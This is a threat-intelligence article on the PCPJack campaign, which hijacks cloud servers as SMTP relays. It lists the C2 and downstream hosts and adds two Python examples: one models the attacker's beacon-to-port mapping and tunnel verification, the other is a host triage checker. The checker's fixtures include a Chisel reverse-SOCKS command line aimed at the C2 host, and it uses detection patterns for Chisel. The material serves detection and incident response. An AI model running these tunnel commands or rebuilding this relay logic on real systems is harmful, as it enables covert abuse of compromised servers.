
PCPJack Hijacks Cloud Servers for Covert SMTP Relay Network


"Compromised business servers across the U.S., Europe, and Asia were quietly converted into SMTP proxies, verified for mail relay capability, and synced to a downstream consumer every five minutes," Hunt.io said in a statement.

Hunt.io outlines the intrusion and what was recovered

Security firm Hunt.io reported that the threat actor known as PCPJack had hijacked cloud servers in Amazon Web Services, Google Cloud, and Microsoft Azure and repurposed them as covert SMTP relays. Investigators who accessed two unauthenticated open directories on a command-and-control (C2) host at 213.136.80[.]73 found source code, compiled binaries, deployment logs, internet scanners, exploitation tooling and a live Sliver configuration. Hunt.io said the infrastructure was still running when it was discovered.

Tools and implants: Sliver, Chisel, and hidden binaries

The recovered files included a Sliver-integrated SMTP proxy deployment toolkit and Chisel tunneling and proxy binaries built for common Linux CPU architectures (AMD64, ARM64, x86). On victim hosts the payload is dropped as a hidden, dot-prefixed file and persisted at /var/tmp/.xs. Deployer scripts were found that load the Sliver C2 client configuration and filter for Linux beacons that had checked in within the prior ten minutes; those beacons are implants that periodically phone home to the C2 server to retrieve commands.

SMTP gating, proxy mapping, and verification logic

Hunt.io described operational logic that makes the operation's purpose clear: an SMTP quality gate probes for outbound access to smtp.gmail[.]com:587, and hosts that fail the check are skipped with an exit code of zero, so a skipped host is not recorded as a deployment failure. Each beacon is assigned a deterministic SOCKS5 proxy port derived from an MD5 hash of its Sliver UUID and mapped into the range 10000–14999, ensuring the same beacon maps to the same port across runs without a shared registry. A separate Python daemon named chisel_verifier.py runs persistently on the C2, enumerating Chisel tunnel ports every 60 seconds (via ss -tlnp), testing each newly seen port for SMTP capability, and removing failed tunnels from the active pool.
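The two mechanical pieces of that paragraph, the UUID-to-port mapping and the verifier's port enumeration, are modelled in the added Python example below. This is illustrative code written for this page, not Hunt.io's or PCPJack's recovered tooling: the exact reduction of the MD5 digest into the 10000–14999 window is an assumption (the page only says the port is derived from the hash and mapped into that range), the `ss -tlnp` output is constructed, and the network SMTP probe that sits between enumeration and pool update is omitted.

```python
import hashlib
import re

# Assumed port window from the report: 10000..14999 inclusive (5000 slots).
PORT_BASE = 10000
PORT_SPAN = 5000


def beacon_socks_port(sliver_uuid: str) -> int:
    """Map a Sliver beacon UUID to a SOCKS5 port in 10000-14999.

    Assumption: MD5 digest read as an integer, reduced modulo the window.
    The mapping is deterministic, so the same beacon always lands on the
    same port across runs without any shared registry. Two different UUIDs
    can still collide on one of the 5000 slots; this model does not resolve
    that, and neither does the page say how the real tooling does.
    """
    digest = hashlib.md5(sliver_uuid.encode()).hexdigest()
    return PORT_BASE + int(digest, 16) % PORT_SPAN


# Constructed sample of `ss -tlnp` output as the verifier would see it on the
# C2 host: sshd, the Chisel server on 9000, two per-beacon tunnel listeners in
# the proxy window, and an unrelated Postgres listener.
SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      4096   0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      4096   0.0.0.0:9000        0.0.0.0:*         users:(("chisel",pid=2201,fd=7))
LISTEN 0      4096   127.0.0.1:10117     0.0.0.0:*         users:(("chisel",pid=2201,fd=9))
LISTEN 0      4096   127.0.0.1:13842     0.0.0.0:*         users:(("chisel",pid=2201,fd=11))
LISTEN 0      128    127.0.0.1:5432      0.0.0.0:*         users:(("postgres",pid=640,fd=5))
"""

# One LISTEN row: local addr:port, peer, and the first process name in users:(...)
SS_LINE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)"')


def chisel_tunnel_ports(ss_output: str, lo: int = PORT_BASE,
                        hi: int = PORT_BASE + PORT_SPAN - 1) -> list[int]:
    """Return listening ports owned by a chisel process inside the proxy window."""
    ports = []
    for line in ss_output.splitlines():
        m = SS_LINE.match(line)
        if not m:
            continue
        port, proc = int(m.group(2)), m.group(3)
        if proc == "chisel" and lo <= port <= hi:
            ports.append(port)
    return sorted(ports)


def diff_pool(active: set[int], seen: list[int]) -> tuple[set[int], set[int]]:
    """One verifier cycle: (ports to probe for SMTP, ports that vanished).

    New ports go to the SMTP check before joining the pool; ports no longer
    listening are dropped from it without a probe.
    """
    seen_set = set(seen)
    return seen_set - active, active - seen_set


if __name__ == "__main__":
    uuid = "3f1c2a9e-0b7d-4e55-9d1a-6c8e2f4b1a10"  # constructed UUID
    print("port for", uuid, "->", beacon_socks_port(uuid))
    print("chisel tunnel ports:", chisel_tunnel_ports(SS_SAMPLE))
    print("pool delta:", diff_pool({10117, 12000}, chisel_tunnel_ports(SS_SAMPLE)))
```

For a hunter the useful property is the first function: given a Sliver UUID recovered from an implant, the port it would occupy on the C2 is computable in advance, so proxy-list entries and tunnel listeners can be tied back to specific beacons.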

Scale, cadence, and data flows

The recovered files reflected a pool of 230 nodes. Verified proxies are enriched with exit IP address, country and ASN using services such as api.ipify[.]org and ip-api[.]com, and the resulting proxy lists are synced via SCP every five minutes to a downstream server at 38.242.204[.]245, which was not accessible at the time of reporting. Initial deployer scripts processed beacons in batches of 50, pausing 25 minutes after uploads and 15 minutes after execution to accommodate slow beacon check-ins; later iterations of the script removed both the SMTP gate and the batching logic. A diagnostic script was also present that checks for Chisel binaries at known drop paths, running Chisel processes, disk space, reachability of port 9000 on the C2, and the presence of persistence artifacts such as cron entries or systemd services.

What this means for technologists, affected enterprises, and adversaries

  • Technologists and security teams: Hunt.io's findings point to specific indicators to hunt for: hidden dot-prefixed binaries at /var/tmp/.xs, Chisel and Sliver artifacts, SOCKS5 listeners in the 10000–14999 range, and a persistent chisel_verifier.py process on any exposed management host. On the network side, a cloud workload that suddenly connects to smtp.gmail[.]com:587, to 213.136.80[.]73 on port 9000, or to api.ipify[.]org and ip-api[.]com, and a five-minute SCP cadence toward 38.242.204[.]245, are all observable patterns that match the recovered pipeline.
  • Affected enterprises and procurement leaders: Servers in AWS, Google Cloud, and Azure were co-opted as SMTP proxies. Organizations should inspect cloud workloads for unexpected hidden processes, cron/systemd persistence entries, and the presence of exploitation tooling or internet scanners in file systems and logs.
  • Adversaries and threat actors: The recovered files show an operational pipeline that deterministically maps beacons to proxy ports, verifies SMTP capability, and maintains an updated list consumed every five minutes—an infrastructure expressly built to deliver outbound mail at scale, regardless of the downstream consumer’s intent.
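Turning the host-side indicators in the list above into a check is straightforward, and the added Python example below does so over constructed inputs. It is not Hunt.io's diagnostic script or any tooling from the report: the `ps`, crontab and systemd samples are constructed to mirror the artifacts the page describes, and the Chisel client command line (a `/var/tmp/.xs` binary reaching the C2 on port 9000 with a reverse SOCKS remote) is an assumption about how the dropped binary would be invoked.

```python
import re

DROP_PATH = "/var/tmp/.xs"          # drop path from the report
C2_HOST = "213.136.80.73"           # C2 host from the report (defanged on the page)
C2_PORT = 9000                      # port the diagnostic script checks on the C2

# Command-line hints for a Chisel client: the binary name, chisel's reverse
# SOCKS remote spec, or the C2 endpoint itself. The R:socks form is an
# assumption about how the tunnels are set up.
CHISEL_HINTS = re.compile(
    rf"(?:^|/)chisel\b|\bR:socks\b|{re.escape(C2_HOST)}:{C2_PORT}\b")

# Constructed `ps -eo pid,comm,args` output for a hijacked host.
PS_SAMPLE = """\
  PID COMMAND  ARGS
  812 sshd     /usr/sbin/sshd -D
 2201 .xs      /var/tmp/.xs client --keepalive 25s 213.136.80.73:9000 R:socks
 3010 python3  /opt/app/worker.py
"""

# Constructed crontab with one legitimate job and one persistence entry.
CRON_SAMPLE = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew -q
@reboot /var/tmp/.xs client 213.136.80.73:9000 R:socks
"""

# Constructed systemd units keyed by path.
SYSTEMD_SAMPLE = {
    "/etc/systemd/system/app.service":
        "[Service]\nExecStart=/opt/app/run\n",
    "/etc/systemd/system/.xs.service":
        "[Service]\nExecStart=/var/tmp/.xs client 213.136.80.73:9000 R:socks\nRestart=always\n",
}


def _looks_like_chisel(text: str) -> bool:
    return DROP_PATH in text or CHISEL_HINTS.search(text) is not None


def suspicious_processes(ps_output: str) -> list[tuple[int, str]]:
    """(pid, args) for processes with a dot-prefixed name or a Chisel-like command line."""
    hits = []
    for line in ps_output.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, comm, args = parts
        if comm.startswith(".") or _looks_like_chisel(args):
            hits.append((int(pid), args))
    return hits


def suspicious_cron(cron_text: str) -> list[str]:
    """Cron lines (comments excluded) that launch the drop path or a Chisel client."""
    return [l for l in cron_text.splitlines()
            if l.strip() and not l.lstrip().startswith("#") and _looks_like_chisel(l)]


def suspicious_units(units: dict[str, str]) -> list[str]:
    """Unit paths whose name is hidden or whose body references the drop path / Chisel."""
    return sorted(p for p, body in units.items()
                  if p.rsplit("/", 1)[-1].startswith(".") or _looks_like_chisel(body))


def triage(ps_output: str, cron_text: str, units: dict[str, str],
           files_on_disk: set[str]) -> dict:
    """Combine the checks; files_on_disk stands in for an os.path.exists() sweep."""
    result = {
        "drop_path_present": DROP_PATH in files_on_disk,
        "processes": suspicious_processes(ps_output),
        "cron": suspicious_cron(cron_text),
        "units": suspicious_units(units),
    }
    result["compromised"] = (result["drop_path_present"] or bool(result["processes"])
                             or bool(result["cron"]) or bool(result["units"]))
    return result


if __name__ == "__main__":
    report = triage(PS_SAMPLE, CRON_SAMPLE, SYSTEMD_SAMPLE, {"/var/tmp/.xs", "/etc/passwd"})
    for key, value in report.items():
        print(f"{key}: {value}")
```

On a live host the three samples would come from `ps -eo pid,comm,args`, the user and system crontabs, and the unit files under /etc/systemd/system; the structure of the checks stays the same, and any single hit is enough to isolate the workload and pull the binary at /var/tmp/.xs for analysis.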

SentinelOne first identified PCPJack in April 2026 after observing a credential-theft framework that targets cloud services and that terminates and removes processes and artifacts associated with TeamPCP. Hunt.io characterized the campaign as opportunistic and noted it could not determine from the recovered files whether the progression reflected a single operator iterating or multiple actors sharing infrastructure. The immediate end goal remains unclear: the verified proxy list was being consumed, but whether for spam, phishing, or something else could not be established from the recovered files. What was clear is that infrastructure built to deliver mail at scale was running.

Source: The Hacker News